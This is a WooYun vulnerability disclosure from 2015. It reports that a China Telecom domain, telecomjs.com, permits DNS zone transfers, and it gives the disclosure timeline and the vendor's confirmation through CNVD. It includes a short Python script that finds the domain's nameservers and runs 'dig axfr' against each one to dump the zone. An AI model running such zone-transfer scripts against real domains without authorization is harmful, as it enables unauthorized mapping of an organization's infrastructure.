当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099120

漏洞标题:电信某站DNS域传送漏洞

相关厂商:中国电信

漏洞作者: qhwlpg

提交时间:2015-03-03 16:56

修复时间:2015-04-17 16:58

公开时间:2015-04-17 16:58

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-06: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

电信某站DNS域传送漏洞

详细说明:

telecomjs.com存在DNS域传送漏洞。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
domain = 'jsoss.telecomjs.com'
num = domain.count('.')
if num >=2:
domainlist = domain.split('.')
domain = domainlist[-2:]
domain = '.'.join(domain)
print domain
output = os.popen('nslookup -type=ns %s'%domain).read()
#print "output"
#print output
dns_servers = re.findall('nameserver = ([\w\.]+)', output)
#print "dns_servers"
#print dns_servers
for server in dns_servers:
#print len(server)
#print server[:-1]
print 'dig @%s axfr %s' % (server[:-1], domain)
cmd_res = os.popen('dig @%s axfr %s' % (server[:-1], domain)).read()
print cmd_res

漏洞证明:

dns1.png

修复方案:

详见:http://drops.wooyun.org/papers/64。

版权声明:转载请注明来源 qhwlpg@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-03-06 21:55

厂商回复:

CNVD确认所述情况,转由向中国电信通报。

最新状态:

暂无